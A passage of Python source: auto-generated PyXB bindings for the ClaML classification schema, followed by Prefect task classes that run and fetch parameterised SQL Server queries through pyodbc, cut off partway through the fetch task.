transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_30._Automaton = _BuildAutomaton_21()
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_31._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_31, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_22 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_22
del _BuildAutomaton_22
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 330, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_31._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_31._Automaton = _BuildAutomaton_22()
CTD_ANON_32._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_32, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_23 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_23
del _BuildAutomaton_23
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 337, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_32._Automaton = _BuildAutomaton_23()
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_24 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_24
del _BuildAutomaton_24
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 345, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_33._Automaton = _BuildAutomaton_24()
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Row'), CTD_ANON_35, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('ClaML.xsd', 358, 4)))
def _BuildAutomaton_25 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_25
del _BuildAutomaton_25
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Row')), pyxb.utils.utility.Location('ClaML.xsd', 353, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_34._Automaton = _BuildAutomaton_25()
CTD_ANON_35._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Cell'), CTD_ANON_36, scope=CTD_ANON_35, location=pyxb.utils.utility.Location('ClaML.xsd', 366, 4)))
def _BuildAutomaton_26 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_26
del _BuildAutomaton_26
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 361, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Cell')), pyxb.utils.utility.Location('ClaML.xsd', 361, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_35._Automaton = _BuildAutomaton_26()
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Para'), CTD_ANON_25, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 264, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Include'), CTD_ANON_26, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 285, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'List'), CTD_ANON_28, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 297, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Table'), CTD_ANON_30, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 317, 4)))
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_27 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_27
del _BuildAutomaton_27
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 368, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Para')), pyxb.utils.utility.Location('ClaML.xsd', 370, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Include')), pyxb.utils.utility.Location('ClaML.xsd', 371, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'List')), pyxb.utils.utility.Location('ClaML.xsd', 372, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Table')), pyxb.utils.utility.Location('ClaML.xsd', 373, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_36._Automaton = _BuildAutomaton_27()
def _BuildAutomaton_28 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_28
del _BuildAutomaton_28
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_37._Automaton = _BuildAutomaton_28()
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4)))
def _BuildAutomaton_29 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_29
del _BuildAutomaton_29
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 117, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Display')), pyxb.utils.utility.Location('ClaML.xsd', 117, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_38._Automaton = _BuildAutomaton_29()
CTD_ANON_39._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_39._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass'), CTD_ANON_18, scope=CTD_ANON_39, location=pyxb.utils.utility.Location('ClaML.xsd', 211, 4)))
def _BuildAutomaton_30 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_30
del _BuildAutomaton_30
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 189, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 190, 16))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_39._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 189, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_39._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ValidModifierClass')), pyxb.utils.utility.Location('ClaML.xsd', 190, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_39._Automaton = _BuildAutomaton_30()
CTD_ANON_40._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Reference'), CTD_ANON_24, scope=CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 254, 4)))
CTD_ANON_40._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Term'), CTD_ANON_37, scope=CTD_ANON_40, location=pyxb.utils.utility.Location('ClaML.xsd', 380, 4)))
def _BuildAutomaton_31 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_31
del _BuildAutomaton_31
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 272, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 6, 12))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_40._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Reference')), pyxb.utils.utility.Location('ClaML.xsd', 7, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_40._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Term')), pyxb.utils.utility.Location('ClaML.xsd', 8, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True),
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_40._Automaton = _BuildAutomaton_31()
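# A minimal usage sketch for the bindings above, with assumptions flagged:
# it presumes this generated module was saved as claml.py, the input file
# name is invented, and the "Class"/"code"/"Rubric" accessors reflect the
# ClaML schema as commonly published rather than anything stated here.

import claml

with open("icd10.claml.xml", "rb") as f:        # hypothetical input document
    root = claml.CreateFromDocument(f.read())   # PyXB's generated parse entry point

for cls in root.Class:                          # repeated child elements behave like lists
    for rubric in cls.Rubric:
        print(cls.code, rubric.kind)            # 'code' and 'kind' are assumed attributes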
# --- Next file: src/prefect/tasks/sql_server/sql_server.py ---
# repo: nicolasiltis/prefect (Apache-2.0), Python, 11,107 bytes
# blob hexsha df65c716b41d51b49b50cf34ea3d10e60c5c0e4a, head 4298105651c2fe02b21013ae8a0468e9e101154d
# 8,633 stars, 3,903 issue events, 937 forks (activity 2019-03-23 to 2022-03-31)
import pyodbc
from prefect import Task
from prefect.utilities.tasks import defaults_from_attrs
class SqlServerExecute(Task):
"""
Task for executing a query against a SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 1433 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using placeholder
in query string
- commit (bool, optional): set to True to commit transaction, defaults to false
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
query: str = None,
data: tuple = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("query", "data", "commit")
def run(
self,
query: str = None,
data: tuple = None,
commit: bool = False,
password: str = None,
):
"""
Task run method. Executes a query against a SQL Server database.
Args:
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using
placeholder in query string
- commit (bool, optional): set to True to commit transaction, defaults to False
- password (str): password used to authenticate; should be provided from a `Secret` task
Returns:
- the ``pyodbc`` cursor returned by ``execute``
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
user=self.user,
password=password,
)
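# NOTE (editorial, hedged): pyodbc is documented to translate a few
# connect() keywords into connection-string attributes (host -> SERVER,
# user -> UID, password -> PWD); other keywords are appended as-is.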
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as cursor:
if data:
executed = cursor.execute(query, data)
else:
executed = cursor.execute(query)
if commit:
cnxn.commit()
else:
cnxn.rollback()
return executed
# ensure connection is closed
finally:
cnxn.close()
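# Illustrative usage sketch (editorial addition, hypothetical names): thanks
# to @defaults_from_attrs, query/data/commit set at init time can be
# overridden per run() call; the password should come from a Secret task.
#
#     from prefect import Flow
#     from prefect.tasks.secrets import PrefectSecret
#
#     execute = SqlServerExecute(
#         db_name="mydb", user="etl", host="db.example.com",
#         query="INSERT INTO events (name) VALUES (?)",
#     )
#     with Flow("sqlserver-demo") as flow:
#         password = PrefectSecret("SQLSERVER_PASSWORD")
#         execute(data=("signup",), commit=True, password=password)
#     # flow.run()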
class SqlServerExecuteMany(Task):
"""
Task for executing many queries against a SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 1433 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- query (str, optional): query to execute against database
- data (List[tuple], optional): list of parameter tuples to use in query, must be
specified using placeholders in query string
- commit (bool, optional): set to True to commit transaction, defaults to False
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
query: str = None,
data: list = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("query", "data", "commit")
def run(
self,
query: str = None,
data: list = None,
commit: bool = False,
password: str = None,
fast_executemany=False,
):
"""
Task run method. Executes many queries against a SQL Server database.
Args:
- query (str, optional): query to execute against database
- data (List[tuple], optional): list of values to use in query, must be specified using
placeholder
- commit (bool, optional): set to True to commit transaction, defaults to False
- password (str): password used to authenticate; should be provided from a `Secret` task
- fast_executemany (bool, optional): sends all parameter sets to the DB server in one
bundle with the SQL statement; the DB executes the SQL against all parameter sets as one DB transaction
Returns:
- the ``pyodbc`` cursor returned by ``executemany``
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
if not data:
raise ValueError("A data list must be provided")
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
user=self.user,
password=password,
)
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as cursor:
if fast_executemany:
cursor.fast_executemany = True
executed = cursor.executemany(query, data)
if commit:
cnxn.commit()
else:
cnxn.rollback()
return executed
# ensure connection is closed
finally:
cnxn.close()
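# Illustrative sketch (editorial addition, hypothetical names): executemany
# runs the statement once per parameter tuple; fast_executemany=True asks
# pyodbc to send every parameter set to the server in a single round trip.
#
#     rows = [("alice",), ("bob",), ("carol",)]
#     insert_users = SqlServerExecuteMany(
#         db_name="mydb", user="etl", host="db.example.com",
#         query="INSERT INTO users (name) VALUES (?)",
#     )
#     # inside a Flow:
#     #     insert_users(data=rows, commit=True, password=password,
#     #                  fast_executemany=True)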
class SqlServerFetch(Task):
"""
Task for fetching results of query from SQL Server database.
Args:
- db_name (str): name of SQL Server database
- user (str): user name used to authenticate
- host (str): database host address
- port (int, optional): port used to connect to SQL Server database, defaults to 1433 if
not provided
- driver (str, optional): driver used to communicate with SQL Server database
- fetch (str, optional): one of "one", "many", or "all", used to determine how many
results to fetch from executed query
- fetch_count (int, optional): if fetch = 'many', determines the number of results
to fetch, defaults to 10
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using placeholder
in query string
- commit (bool, optional): set to True to commit transaction, defaults to False
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
db_name: str,
user: str,
host: str,
port: int = 1433,
driver: str = "ODBC Driver 17 for SQL Server",
fetch: str = "one",
fetch_count: int = 10,
query: str = None,
data: tuple = None,
commit: bool = False,
**kwargs
):
self.db_name = db_name
self.user = user
self.host = host
self.port = port
self.fetch = fetch
self.fetch_count = fetch_count
self.driver = driver
self.query = query
self.data = data
self.commit = commit
super().__init__(**kwargs)
@defaults_from_attrs("fetch", "fetch_count", "query", "data", "commit")
def run(
self,
fetch: str = "one",
fetch_count: int = 10,
query: str = None,
data: tuple = None,
commit: bool = False,
password: str = None,
):
"""
Task run method. Executes a query against a SQL Server database and fetches results.
Args:
- fetch (str, optional): one of "one", "many", or "all", used to determine how many
results to fetch from executed query
- fetch_count (int, optional): if fetch = 'many', determines the number of results
to fetch, defaults to 10
- query (str, optional): query to execute against database
- data (tuple, optional): values to use in query, must be specified using
placeholder in query string
- commit (bool, optional): set to True to commit transaction, defaults to False
- password (str): password used to authenticate; should be provided from a `Secret` task
Returns:
- records (tuple or list of tuples): records from provided query
Raises:
- ValueError: if query parameter is None or a blank string
- DatabaseError: if exception occurs when executing the query
"""
if not query:
raise ValueError("A query string must be provided")
if fetch not in {"one", "many", "all"}:
raise ValueError(
"The 'fetch' parameter must be one of the following - ('one', 'many', 'all')"
)
# connect to database
cnxn = pyodbc.connect(
driver=self.driver,
host=self.host,
database=self.db_name,
port=self.port,
